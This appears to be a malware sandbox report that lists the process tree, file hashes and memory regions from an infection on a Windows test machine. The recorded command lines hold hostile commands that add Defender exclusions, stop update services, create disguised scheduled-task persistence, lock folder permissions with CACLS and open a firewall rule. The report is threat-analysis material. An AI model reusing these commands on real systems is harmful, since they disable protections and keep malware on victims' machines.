"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2228,14571124730971340758,5757114002690927345,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6352 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2228,14571124730971340758,5757114002690927345,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6352 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,14571124730971340758,5757114002690927345,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6252 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,14571124730971340758,5757114002690927345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4056 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,14571124730971340758,5757114002690927345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4004 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,14571124730971340758,5757114002690927345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\A35F.exe

C:\Users\Admin\AppData\Local\Temp\A35F.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jj1mx0an.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jj1mx0an.exe

C:\Users\Admin\AppData\Local\Temp\A6EA.exe

C:\Users\Admin\AppData\Local\Temp\A6EA.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\vp0qI8nC.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\vp0qI8nC.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\jB9tY4oN.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\jB9tY4oN.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\IU9HJ2Tq.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\IU9HJ2Tq.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1th20qt9.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1th20qt9.exe

C:\Users\Admin\AppData\Local\Temp\AA18.bat

"C:\Users\Admin\AppData\Local\Temp\AA18.bat"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 440 -ip 440

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4124 -ip 4124

C:\Users\Admin\AppData\Local\Temp\AE11.exe

C:\Users\Admin\AppData\Local\Temp\AE11.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1912 -ip 1912

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AC1A.tmp\AC2A.tmp\AC2B.bat C:\Users\Admin\AppData\Local\Temp\AA18.bat"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4124 -s 412

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 440 -s 600

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1912 -s 540

C:\Users\Admin\AppData\Local\Temp\AF69.exe

C:\Users\Admin\AppData\Local\Temp\AF69.exe

C:\Users\Admin\AppData\Local\Temp\B1EB.exe

C:\Users\Admin\AppData\Local\Temp\B1EB.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1076 -ip 1076

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2VR740tb.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2VR740tb.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1076 -s 416

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9dd7746f8,0x7ff9dd774708,0x7ff9dd774718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,14571124730971340758,5757114002690927345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5856 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9dd7746f8,0x7ff9dd774708,0x7ff9dd774718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,14571124730971340758,5757114002690927345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:1

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,14571124730971340758,5757114002690927345,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\FCC0.exe

C:\Users\Admin\AppData\Local\Temp\FCC0.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\4DF.exe

C:\Users\Admin\AppData\Local\Temp\4DF.exe

C:\Users\Admin\AppData\Local\Temp\AFB.exe

C:\Users\Admin\AppData\Local\Temp\AFB.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\E19.exe

C:\Users\Admin\AppData\Local\Temp\E19.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 5356 -ip 5356

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 792

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

Network


Files


C:\Users\Admin\AppData\Local\Temp\A6EA.exe

MD5 9c28b020233d996a81f1aadc2c99d684
SHA1 b60d0dafc9b8b74e3f6e31fe6736a4c067a0683c
SHA256 36c5906edf1c63b85a2c5e70e070d38446bae1217ec98049351d93c2003608f5
SHA512 5743921579d6c4d49fdcbb069e3a84a1be7e30dee20a3906d7eafc6b52297292fc40cb5a6b4f87cb20f18bd5b056da766f41e40aab034ee830f3e489ac313cb7

C:\Users\Admin\AppData\Local\Temp\AA18.bat

MD5 9db53ae9e8af72f18e08c8b8955f8035
SHA1 50ae5f80c1246733d54db98fac07380b1b2ff90d
SHA256 d1d32c30e132d6348bd8e8baff51d1b706e78204b7f5775874946a7019a92b89
SHA512 3cfb3104befbb5d60b5844e3841bf7c61baed8671191cfc42e0666c6ce92412ab235c70be718f52cfbd0e338c9f6f04508e0fd07b30f9bbda389e2e649c199d1

C:\Users\Admin\AppData\Local\Temp\AA18.bat

MD5 9db53ae9e8af72f18e08c8b8955f8035
SHA1 50ae5f80c1246733d54db98fac07380b1b2ff90d
SHA256 d1d32c30e132d6348bd8e8baff51d1b706e78204b7f5775874946a7019a92b89
SHA512 3cfb3104befbb5d60b5844e3841bf7c61baed8671191cfc42e0666c6ce92412ab235c70be718f52cfbd0e338c9f6f04508e0fd07b30f9bbda389e2e649c199d1

memory/1912-349-0x0000000000400000-0x0000000000433000-memory.dmp

memory/1728-350-0x0000000000400000-0x0000000000433000-memory.dmp

memory/1912-347-0x0000000000400000-0x0000000000433000-memory.dmp

memory/1728-352-0x0000000000400000-0x0000000000433000-memory.dmp

memory/1912-353-0x0000000000400000-0x0000000000433000-memory.dmp

memory/1728-355-0x0000000000400000-0x0000000000433000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\AE11.exe

MD5 ce5724ed62569c79d5828db35e5e620b
SHA1 12321d5ab64eeee54ea7ef6cbace1607043d8a12
SHA256 6cc6811c39e7bc94f3cab5599006040a0a55b5d6be3d2d0353582716bda9f7a9
SHA512 14902d086f2379b0d6324032fe6146ca1f242123ccccea6136582a577e13bd1701e88f2e897723e67bcbf91add3be15ee215dee6955d36d85505753675256cb2

C:\Users\Admin\AppData\Local\Temp\AE11.exe

MD5 ce5724ed62569c79d5828db35e5e620b
SHA1 12321d5ab64eeee54ea7ef6cbace1607043d8a12
SHA256 6cc6811c39e7bc94f3cab5599006040a0a55b5d6be3d2d0353582716bda9f7a9
SHA512 14902d086f2379b0d6324032fe6146ca1f242123ccccea6136582a577e13bd1701e88f2e897723e67bcbf91add3be15ee215dee6955d36d85505753675256cb2

C:\Users\Admin\AppData\Local\Temp\AF69.exe

MD5 57543bf9a439bf01773d3d508a221fda
SHA1 5728a0b9f1856aa5183d15ba00774428be720c35
SHA256 70d2e4df54793d08b8e76f1bb1db26721e0398da94dca629ab77bd41cc27fd4e
SHA512 28f2eb1fef817df513568831ca550564d490f7bd6c46ada8e06b2cd81bbc59bc2d7b9f955dbfc31c6a41237d0d0f8aa40aaac7ae2fabf9902228f6b669b7fe20

C:\Users\Admin\AppData\Local\Temp\AF69.exe

MD5 57543bf9a439bf01773d3d508a221fda
SHA1 5728a0b9f1856aa5183d15ba00774428be720c35
SHA256 70d2e4df54793d08b8e76f1bb1db26721e0398da94dca629ab77bd41cc27fd4e
SHA512 28f2eb1fef817df513568831ca550564d490f7bd6c46ada8e06b2cd81bbc59bc2d7b9f955dbfc31c6a41237d0d0f8aa40aaac7ae2fabf9902228f6b669b7fe20

memory/316-363-0x0000000000110000-0x000000000011A000-memory.dmp

memory/316-364-0x00007FF9D8C60000-0x00007FF9D9721000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B1EB.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

C:\Users\Admin\AppData\Local\Temp\B1EB.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

C:\Users\Admin\AppData\Local\Temp\AC1A.tmp\AC2A.tmp\AC2B.bat

MD5 0ec04fde104330459c151848382806e8
SHA1 3b0b78d467f2db035a03e378f7b3a3823fa3d156
SHA256 1ee0a6f7c4006a36891e2fd72a0257e89fd79ad811987c0e17f847fe99ea695f
SHA512 8b928989f17f09282e008da27e8b7fd373c99d5cafb85b5f623e02dbb6273f0ed76a9fbbfef0b080dbba53b6de8ee491ea379a38e5b6ca0763b11dd4de544b40

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

memory/3480-378-0x0000000073A70000-0x0000000074220000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 78e5bc5b95cf1717fc889f1871f5daf6
SHA1 65169a87dd4a0121cd84c9094d58686be468a74a
SHA256 7d2e2e4f369bcdbbe4a1d9acd299e230adc522d46e54f59e321622d80da02966
SHA512 d97bc87809e5f52cd015ced62488f738ea24a16c31d1fb836091b72112b200e304f0d8fab3ef762411b662ed60df0ca5fc24d4e98adb22b79e5e74a9292c1500

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2VR740tb.exe

MD5 fbeb83d8ac9e07a6391b6ff726915e09
SHA1 30df12929f8c3ae5ed3e2da02a29beaf29593293
SHA256 2bdb9a5f5624a3af485897f23de2d5e7c37ceee27fc951cf6c0322a243ce4bbe
SHA512 563d2dffea3e3f06ad92e894cb1244d0d2b818a43dd537dec50b47542842bf160c522bf6d4317f90968e94cbbf3a83948a7307d08a5d0b4a0759e1f01c1522c6

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2VR740tb.exe

MD5 fbeb83d8ac9e07a6391b6ff726915e09
SHA1 30df12929f8c3ae5ed3e2da02a29beaf29593293
SHA256 2bdb9a5f5624a3af485897f23de2d5e7c37ceee27fc951cf6c0322a243ce4bbe
SHA512 563d2dffea3e3f06ad92e894cb1244d0d2b818a43dd537dec50b47542842bf160c522bf6d4317f90968e94cbbf3a83948a7307d08a5d0b4a0759e1f01c1522c6

memory/1728-383-0x0000000000400000-0x0000000000433000-memory.dmp

memory/3480-381-0x0000000007590000-0x00000000075A0000-memory.dmp

memory/4704-386-0x0000000073A70000-0x0000000074220000-memory.dmp

memory/4704-387-0x0000000000200000-0x000000000023E000-memory.dmp

memory/4704-388-0x0000000007190000-0x00000000071A0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 3d5af55f794f9a10c5943d2f80dde5c5
SHA1 5252adf87d6bd769f2c39b9e8eba77b087a0160d
SHA256 43e50edafcaaeae9fcd4dce5b99bf14fe79dae1401019443f31aa9ff81347764
SHA512 2e2e09a00db732ff934da1e6ab8617fb3c8de482f9667a2c987435d0a5d67550b4bfd66e8b4475012b60908c24e39dff58e2f2ffa55f13ffc55caae1be630c71

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 589f2c74d6ce9bceaadb06c6e92fc856
SHA1 e80bdd360d6f695ab685c7d53bc2e392633ebae6
SHA256 3c02c9db771e27db42ec03cc6d82481f0b2809bed6c032e021a866bc6f26b7af
SHA512 88df419a9d77d627e283b1ab10ffc2eec1a010468d74a3533cba8ea19da78b83f9847f1da32c6f585b163bd3dbe83083867a489eabcc5b4aa3455480c8fd8787

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58c917.TMP

MD5 5034ea19f66f717ee33a12e814eddc63
SHA1 323093aec0b62a7513ac7e319a76b5c43c19d31b
SHA256 654d20451be44b77fe9b10b54cacf1de80474031650e5b3d7f21c7c2bf232398
SHA512 3754ec1ef79a069fb36113af7f694560e50ecc8c71030dbffe75ec6c7ef2f682fcda0c53943486c47ac2596b006499d08c8ace887a99d5ad2cf9653568e4e2d6

memory/316-490-0x00007FF9D8C60000-0x00007FF9D9721000-memory.dmp

memory/3480-501-0x0000000073A70000-0x0000000074220000-memory.dmp

memory/316-503-0x00007FF9D8C60000-0x00007FF9D9721000-memory.dmp

memory/3480-504-0x0000000007590000-0x00000000075A0000-memory.dmp

memory/4704-505-0x0000000073A70000-0x0000000074220000-memory.dmp

memory/4704-506-0x0000000007190000-0x00000000071A0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 821258b8d22ae7d85fd0504277352964
SHA1 1501d1b6c5b24a64dd4fb7c059b7019850edc73a
SHA256 3887e37a175655b2213f1c8b1933c8f3743547273df7ad624be3ca4dd9609475
SHA512 36bd189de2e558e36d585b1fadd1ff230712c7d402832cfdaf690c2055b81bf53c6706cf15984c3afb4f763fe12a8cd4d1f8261a8a43172b9d7124ae41188391

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 2cc59bc8ac8b05cbfc43d6a3b1625f88
SHA1 31120abe0ca094880a66dd6f003d53ca3bbdfe0e
SHA256 d00dc8a363def313f6c4192be4f2711dd3823a39b919b690bbd583499e47a712
SHA512 1b58fd226788ba444a525ee3aa49f7f1ddbbce496f797eb75c398aa6234a78cd1ebf1695dd3293cafe1033c90006a363d9595b057e22fe774299e59d84b77f85

memory/6084-536-0x0000000073A70000-0x0000000074220000-memory.dmp

memory/6084-537-0x0000000000B30000-0x0000000001A5A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 b44f3ea702caf5fba20474d4678e67f6
SHA1 d33da22fcd5674123807aaf01123d49a69901e33
SHA256 6b066c420ab228bf788f1abda2911eefbb89834640e64d8d6b4f14cb963e4eb8
SHA512 ed0dcd43d8bb8bab253daaf069353d1c720aa13217230d643e2c056089d56753aa4df5ee478833f716e248277c2553e81ae9c21f0f1502fdaf5bbac726d2a0c3

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 aa6f521d78f6e9101a1a99f8bfdfbf08
SHA1 81abd59d8275c1a1d35933f76282b411310323be
SHA256 3d5c0be6aafffa6324a44619131ff8994b0b59856dedf444ced072cae1ebc39d
SHA512 43ce4ad2d8295880ca1560c7a14cff89f2dfa70942d7679faae417f58177f63ae436604bbe914bd8fbbaedfb992ab6da4637af907e2b28696be53843d7ed8153

C:\Users\Admin\AppData\Local\Temp\source1.exe

MD5 e082a92a00272a3c1cd4b0de30967a79
SHA1 16c391acf0f8c637d36a93e217591d8319e3f041
SHA256 eb318c91e0a9f49ad218298a13f7d8981e6ab145097107e5316d857943bc1cdc
SHA512 26b77179a46e1a72dab0cfa99e030133e99057d10e14a36ed3ef4935e7778b0f6505bad43b14523275e7dc5937bb2f5f7c650cb7ec6e7012cbbe874e52c15288

memory/1804-559-0x0000000073A70000-0x0000000074220000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/1804-565-0x00000000005A0000-0x0000000000AB6000-memory.dmp

memory/6084-568-0x0000000073A70000-0x0000000074220000-memory.dmp

memory/1804-571-0x00000000053D0000-0x00000000053E0000-memory.dmp

memory/1804-572-0x0000000005620000-0x00000000056BC000-memory.dmp

memory/1804-573-0x0000000005360000-0x0000000005361000-memory.dmp

memory/5356-575-0x0000000000400000-0x000000000046F000-memory.dmp

memory/1244-578-0x00000000023C0000-0x00000000024C0000-memory.dmp

memory/5452-580-0x0000000000400000-0x0000000000409000-memory.dmp

memory/5356-581-0x00000000020C0000-0x000000000211A000-memory.dmp

memory/1244-579-0x0000000002310000-0x0000000002319000-memory.dmp

memory/5452-584-0x0000000000400000-0x0000000000409000-memory.dmp

memory/5092-589-0x0000000004190000-0x0000000004598000-memory.dmp

memory/5092-590-0x00000000046A0000-0x0000000004F8B000-memory.dmp

memory/5356-591-0x0000000073A70000-0x0000000074220000-memory.dmp

memory/5512-592-0x0000000000F30000-0x0000000000F4E000-memory.dmp

memory/1860-594-0x00000000001D0000-0x00000000001EE000-memory.dmp

memory/5092-593-0x0000000000400000-0x000000000266D000-memory.dmp

memory/1860-595-0x0000000000400000-0x0000000000431000-memory.dmp

memory/1804-598-0x0000000073A70000-0x0000000074220000-memory.dmp

memory/5512-600-0x0000000073A70000-0x0000000074220000-memory.dmp

memory/1860-601-0x0000000073A70000-0x0000000074220000-memory.dmp

memory/5356-602-0x0000000000400000-0x000000000046F000-memory.dmp

